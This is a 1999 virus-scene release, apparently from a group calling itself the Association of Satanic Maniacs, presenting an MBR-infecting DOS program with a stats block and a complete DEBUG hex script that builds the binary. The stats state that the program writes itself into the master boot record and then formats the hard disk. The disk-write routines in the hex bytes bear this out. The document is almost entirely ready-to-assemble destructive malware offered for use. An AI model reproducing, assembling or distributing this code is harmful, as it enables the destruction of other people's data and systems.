Debug Script @ Bottom

Stats:
        Name              Mbr Kill
        Infex             FAT
        Destruction       Put's into MBR program, who formats HD
        Encrypted         Not needed...



brought to you by MiB /ASM   1999

    _____     ____      ____
   / ___ \   / __ \    /    \
  / /__/ /  / /__\/   / /\/\ \
 / ___  /   \___ \   / /   / /
/ /  / /   /\__/ /  / /   / /
\/   \/    \____/   \/    \/

ASSOCIATION OF SATANIC MANIACS

http://association.cjb.net

N MBR.COM
E 0100 B8 80 9F 8E C0 B8 01 02 B9 01 00 BA 80 00 33 DB 
E 0110 CD 13 0E 1F B8 80 9F 8E C0 BE 3A 01 33 FF B9 69 
E 0120 00 F3 A4 B8 80 9F 8E C0 33 DB B8 01 03 32 ED BA 
E 0130 80 00 B1 01 BB 00 00 CD 13 C3 FA 33 C0 8E D0 BC 
E 0140 00 7C 8B F4 50 07 50 1F FB 9C 50 51 52 1E 06 EB 
E 0150 0A 90 07 1F 5A 59 58 9D EB 5F 90 33 D2 B9 02 00 
E 0160 B8 11 03 B2 80 BB 00 50 8E C3 CD 13 73 04 32 E4 
E 0170 CD 13 FE C6 80 FE 04 72 E4 FE C5 EB DE 59 6F 75 
E 0180 20 6C 69 76 65 73 20 73 6F 6D 65 77 65 72 65 20 
E 0190 69 6E 20 74 69 6D 65 2C 20 79 6F 75 20 6C 61 6D 
E 01A0 65 72 21 21 21 20 2D 20 46 45 4C 49 4B 53 20 5A 
E 01B0 45 52 4F 20 43 4F 4F 4C 00 33 C0 8E C0 BB 00 7C 
E 01C0 B4 02 B0 01 B1 01 B5 00 B6 01 B2 80 CD 13 EA 00 
E 01D0 7C 00 00 
RCX
00D3
W
Q
